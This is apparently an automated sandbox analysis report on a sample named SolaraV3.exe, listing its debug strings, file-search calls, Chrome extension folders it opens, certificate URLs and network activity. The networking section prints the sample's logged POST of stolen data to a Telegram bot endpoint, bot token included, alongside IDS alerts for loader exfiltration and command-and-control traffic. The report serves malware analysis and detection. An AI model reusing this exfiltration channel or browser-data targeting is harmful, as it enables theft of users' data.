              Source: Binary string: compiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -DOPENSSL_CPUID_OBJ -DOPENSSL_IA32_SSE2 -DOPENSSL_BN_ASM_MONT -DOPENSSL_BN_ASM_MONT5 -DOPENSSL_BN_ASM_GF2m -DSHA1_ASM -DSHA256_ASM -DSHA512_ASM -DKECCAK1600_ASM -DRC4_ASM -DMD5_ASM -DAESNI_ASM -DVPAES_ASM -DGHASH_ASM -DECP_NISTZ256_ASM -DX25519_ASM -DPOLY1305_ASM source: SolaraV3.exe, 00000002.00000002.2047840849.00007FFB0BA60000.00000040.00000001.01000000.0000000F.sdmp
              Source: Binary string: ;C:\Users\user\AppData\Local\Temp\se3yji4z\se3yji4z.pdb source: powershell.exe, 0000004A.00000002.1847941368.00000239E7D72000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: ;C:\Users\user\AppData\Local\Temp\se3yji4z\se3yji4z.pdbhP@ source: powershell.exe, 0000004A.00000002.1847941368.00000239E7D72000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: D:\a\1\b\bin\amd64\_lzma.pdb source: SolaraV3.exe, 00000002.00000002.2051343700.00007FFB0C5DB000.00000040.00000001.01000000.00000008.sdmp
              Source: Binary string: D:\a\1\b\bin\amd64\_bz2.pdb source: SolaraV3.exe, SolaraV3.exe, 00000002.00000002.2053371221.00007FFB1C251000.00000040.00000001.01000000.00000009.sdmp
              Source: Binary string: D:\a\1\b\bin\amd64\sqlite3.pdb source: SolaraV3.exe, 00000002.00000002.2050924426.00007FFB0C441000.00000040.00000001.01000000.0000000B.sdmp
              Source: Binary string: D:\a\1\b\bin\amd64\_socket.pdb source: SolaraV3.exe, 00000002.00000002.2052555001.00007FFB1AB01000.00000040.00000001.01000000.0000000C.sdmp
              Source: Binary string: D:\a\1\b\bin\amd64\_sqlite3.pdb source: SolaraV3.exe, 00000002.00000002.2052925726.00007FFB1BB11000.00000040.00000001.01000000.0000000A.sdmp
              Source: Binary string: D:\a\1\b\libcrypto-1_1.pdb source: SolaraV3.exe, SolaraV3.exe, 00000002.00000002.2047840849.00007FFB0BAE2000.00000040.00000001.01000000.0000000F.sdmp
              Source: Binary string: D:\Projects\WinRAR\rar\build\rar64\Release\RAR.pdb source: rar.exe, 0000006E.00000000.1923151482.00007FF74EEE0000.00000002.00000001.01000000.00000022.sdmp, rar.exe, 0000006E.00000002.1937569828.00007FF74EEE0000.00000002.00000001.01000000.00000022.sdmp, rar.exe.1.dr
              Source: Binary string: D:\a\1\b\libssl-1_1.pdb source: SolaraV3.exe, SolaraV3.exe, 00000002.00000002.2050155704.00007FFB0C3C6000.00000040.00000001.01000000.00000010.sdmp
              Source: Binary string: D:\a\1\b\bin\amd64\_ssl.pdb source: SolaraV3.exe, SolaraV3.exe, 00000002.00000002.2050619713.00007FFB0C411000.00000040.00000001.01000000.0000000E.sdmp
              Source: C:\Users\user\Desktop\SolaraV3.exeCode function: 1_2_00007FF6DC709280 FindFirstFileExW,FindClose,1_2_00007FF6DC709280
              Source: C:\Users\user\Desktop\SolaraV3.exeCode function: 1_2_00007FF6DC7083C0 FindFirstFileW,RemoveDirectoryW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,1_2_00007FF6DC7083C0
              Source: C:\Users\user\Desktop\SolaraV3.exeCode function: 1_2_00007FF6DC721874 _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose,1_2_00007FF6DC721874
              Source: C:\Users\user\Desktop\SolaraV3.exeCode function: 2_2_00007FF6DC709280 FindFirstFileExW,FindClose,2_2_00007FF6DC709280
              Source: C:\Users\user\Desktop\SolaraV3.exeCode function: 2_2_00007FF6DC721874 _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose,2_2_00007FF6DC721874
              Source: C:\Users\user\Desktop\SolaraV3.exeCode function: 2_2_00007FF6DC7083C0 FindFirstFileW,RemoveDirectoryW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,2_2_00007FF6DC7083C0
              Source: C:\Users\user\Desktop\SolaraV3.exeCode function: 2_2_00007FFB0B81322E MultiByteToWideChar,GetLastError,MultiByteToWideChar,MultiByteToWideChar,00007FFB2AD9F020,FindFirstFileW,FindNextFileW,WideCharToMultiByte,2_2_00007FFB0B81322E
              Source: C:\Users\user\AppData\Local\Temp\_MEI28842\rar.exeCode function: 110_2_00007FF74EE946EC FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,110_2_00007FF74EE946EC
              Source: C:\Users\user\AppData\Local\Temp\_MEI28842\rar.exeCode function: 110_2_00007FF74EED88E0 FindFirstFileExA,110_2_00007FF74EED88E0
              Source: C:\Users\user\AppData\Local\Temp\_MEI28842\rar.exeCode function: 110_2_00007FF74EE8E21C FindFirstFileW,FindClose,CreateFileW,DeviceIoControl,CloseHandle,110_2_00007FF74EE8E21C
              Source: C:\Users\user\Desktop\SolaraV3.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\imagesJump to behavior
              Source: C:\Users\user\Desktop\SolaraV3.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\htmlJump to behavior
              Source: C:\Users\user\Desktop\SolaraV3.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmiedaJump to behavior
              Source: C:\Users\user\Desktop\SolaraV3.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0Jump to behavior
              Source: C:\Users\user\Desktop\SolaraV3.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\cssJump to behavior
              Source: C:\Users\user\Desktop\SolaraV3.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_localesJump to behavior

              Networking

              barindex
              Source: Network trafficSuricata IDS: 2857751 - Severity 1 - ETPRO MALWARE SynthIndi Loader Exfiltration Activity (POST) : 192.168.2.7:49733 -> 149.154.167.220:443
              Source: Network trafficSuricata IDS: 2857752 - Severity 1 - ETPRO MALWARE SynthIndi Loader CnC Response : 149.154.167.220:443 -> 192.168.2.7:49733
              Source: unknownDNS query: name: api.telegram.org
              Source: Joe Sandbox ViewIP Address: 208.95.112.1 208.95.112.1
              Source: Joe Sandbox ViewASN Name: TUT-ASUS TUT-ASUS
              Source: unknownDNS query: name: ip-api.com
              Source: unknownDNS query: name: ip-api.com
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: global trafficHTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comAccept-Encoding: identityUser-Agent: python-urllib3/2.2.3
              Source: global trafficHTTP traffic detected: GET /json/?fields=225545 HTTP/1.1Host: ip-api.comAccept-Encoding: identityUser-Agent: python-urllib3/2.2.3
              Source: SolaraV3.exe, 00000002.00000002.2043957200.000001FC25BCC000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: `https://www.facebook.com/ equals www.facebook.com (Facebook)
              Source: SolaraV3.exe, 00000002.00000002.2043957200.000001FC25BCC000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: `https://www.youtube.com/ equals www.youtube.com (Youtube)
              Source: global trafficDNS traffic detected: DNS query: blank-a0m8c.in
              Source: global trafficDNS traffic detected: DNS query: ip-api.com
              Source: global trafficDNS traffic detected: DNS query: api.telegram.org
              Source: unknownHTTP traffic detected: POST /bot7576687091:AAHc9LHp1oJNmPES1PMfu8JQQ9jVtHibTlc/sendDocument HTTP/1.1Host: api.telegram.orgAccept-Encoding: identityContent-Length: 727354User-Agent: python-urllib3/2.2.3Content-Type: multipart/form-data; boundary=1c1a3fa26118796b784a6413d888e095
              Source: SolaraV3.exe, 00000001.00000003.1562816571.000001EA2311F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.co
              Source: SolaraV3.exe, 00000001.00000003.1562285520.000001EA2312C000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1562285520.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, libffi-7.dll.1.drString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
              Source: SolaraV3.exe, 00000001.00000003.1562816571.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1560072884.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1559743250.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1560147276.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1563848325.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1563848325.000001EA2312C000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1560368534.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1564291533.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1563980911.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1560266326.000001EA2312C000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1560266326.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1560491890.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1559946901.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1562526846.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1560625770.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1559830158.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1561239565.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, sqlite3.dll.1.dr, libssl-1_1.dll.1.dr, unicodedata.pyd.1.dr, _ssl.pyd.1.drString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
              Source: SolaraV3.exe, 00000001.00000003.1562285520.000001EA2312C000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1562285520.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, libffi-7.dll.1.drString found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDCodeSigningCA.crt0
              Source: SolaraV3.exe, 00000001.00000003.1562816571.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1560072884.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1559743250.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1560147276.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1563848325.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1560368534.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1564291533.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1563980911.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1560266326.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1560491890.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1559946901.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1562526846.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1560625770.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1559830158.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1561239565.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, sqlite3.dll.1.dr, libssl-1_1.dll.1.dr, unicodedata.pyd.1.dr, _ssl.pyd.1.dr, _lzma.pyd.1.dr, _decimal.pyd.1.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt0
              Source: SolaraV3.exe, 00000001.00000003.1562816571.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1560072884.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1559743250.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1560147276.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1563848325.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1560368534.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1564291533.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1563980911.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1560266326.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1560491890.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1559946901.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1562526846.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1560625770.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1559830158.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1561239565.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, sqlite3.dll.1.dr, libssl-1_1.dll.1.dr, unicodedata.pyd.1.dr, _ssl.pyd.1.dr, _lzma.pyd.1.dr, _decimal.pyd.1.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
              Source: SolaraV3.exe, 00000001.00000003.1562816571.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1560072884.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1559743250.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1560147276.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1563848325.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1563848325.000001EA2312C000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1560368534.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1564291533.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1563980911.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1560266326.000001EA2312C000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1560266326.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1560491890.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1559946901.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1562526846.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1560625770.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1559830158.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1561239565.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, sqlite3.dll.1.dr, libssl-1_1.dll.1.dr, unicodedata.pyd.1.dr, _ssl.pyd.1.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
              Source: SolaraV3.exe, 00000002.00000003.2036193521.000001FC252B9000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000002.00000003.1921552847.000001FC252B9000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000002.00000003.1772675599.000001FC252B9000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000002.00000003.1708990356.000001FC252B9000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000002.00000002.2038979504.000001FC252B9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://code.activestate.com/recipes/577452-a-memoize-decorator-for-instance-methods/
              Source: SolaraV3.exe, rar.exe.1.drString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl04
              Source: SolaraV3.exe, 00000002.00000002.2039145947.000001FC252EE000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000002.00000002.2039829113.000001FC2536E000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000002.00000003.2035293287.000001FC252EE000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000002.00000002.2039554025.000001FC25361000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000002.00000003.2035172460.000001FC25320000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000002.00000003.1728427931.000001FC252EE000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000002.00000003.1708604492.000001FC252EE000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000002.00000003.2034874254.000001FC25360000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000002.00000003.1684359906.000001FC2531E000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000002.00000003.1743305378.000001FC252ED000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000002.00000003.2035050176.000001FC2536A000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000002.00000003.2036060899.000001FC25325000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000002.00000003.1695774309.000001FC252E7000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.1794892126.00000267C15D3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001A.00000002.2811239822.000001407C800000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000004A.00000002.1908054026.00000239FE760000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
              Source: SolaraV3.exeString found in binary or memory: http://crl.sectigo.com/SectigoPublicCodeSigningCAEVR36.crl0
              Source: SolaraV3.exeString found in binary or memory: http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl0
              Source: SolaraV3.exe, 00000001.00000003.1563354403.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, rar.exe.1.drString found in binary or memory: http://crl.sectigo.com/SectigoRSACodeSigningCA.crl0s
              Source: SolaraV3.exe, 00000001.00000002.2058209847.000001EA23108000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.sectigo.j$
              Source: SolaraV3.exe, 00000001.00000003.1562285520.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1563354403.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, rar.exe.1.dr, libffi-7.dll.1.drString found in binary or memory: http://crl.thawte.com/ThawteTimestampingCA.crl0
              Source: powershell.exe, 0000004A.00000002.1908054026.00000239FE760000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.v
              Source: svchost.exe, 0000001A.00000002.2811239822.000001407C800000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.ver)
              Source: SolaraV3.exe, 00000001.00000003.1562816571.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1560072884.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1559743250.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1560147276.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1563848325.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1563848325.000001EA2312C000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1560368534.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1564291533.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1563980911.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1560266326.000001EA2312C000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1560266326.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1560491890.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1559946901.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1562526846.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1560625770.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1559830158.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1561239565.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, sqlite3.dll.1.dr, libssl-1_1.dll.1.dr, unicodedata.pyd.1.dr, _ssl.pyd.1.drString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
              Source: SolaraV3.exe, 00000001.00000003.1562285520.000001EA2312C000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1562285520.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, libffi-7.dll.1.drString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0O
              Source: SolaraV3.exe, 00000001.00000003.1562816571.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1560072884.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1559743250.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1560147276.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1563848325.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1560368534.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1564291533.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1563980911.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1560266326.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1560491890.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1559946901.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1562526846.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1560625770.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1559830158.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1561239565.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, sqlite3.dll.1.dr, libssl-1_1.dll.1.dr, unicodedata.pyd.1.dr, _ssl.pyd.1.dr, _lzma.pyd.1.dr, _decimal.pyd.1.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0S
              Source: SolaraV3.exe, 00000001.00000003.1559743250.000001EA2311F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SH
              Source: SolaraV3.exe, 00000001.00000003.1562816571.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1560072884.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1559743250.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1560147276.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1563848325.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1560368534.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1564291533.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1563980911.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1560266326.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1560491890.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1559946901.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1562526846.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1560625770.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1559830158.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1561239565.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, sqlite3.dll.1.dr, libssl-1_1.dll.1.dr, unicodedata.pyd.1.dr, _ssl.pyd.1.dr, _lzma.pyd.1.dr, _decimal.pyd.1.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
              Source: _socket.pyd.1.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
              Source: SolaraV3.exe, 00000001.00000003.1562285520.000001EA2312C000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1562285520.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, libffi-7.dll.1.drString found in binary or memory: http://crl3.digicert.com/sha2-assured-cs-g1.crl05
              Source: SolaraV3.exe, 00000001.00000003.1562285520.000001EA2312C000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1562285520.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, libffi-7.dll.1.drString found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
              Source: SolaraV3.exe, 00000001.00000003.1562816571.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1560072884.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1559743250.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1560147276.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1563848325.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1560368534.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1564291533.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1563980911.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1560266326.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1560491890.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1559946901.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1562526846.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1560625770.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1559830158.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1561239565.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, sqlite3.dll.1.dr, libssl-1_1.dll.1.dr, unicodedata.pyd.1.dr, _ssl.pyd.1.dr, _lzma.pyd.1.dr, _decimal.pyd.1.drString found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0
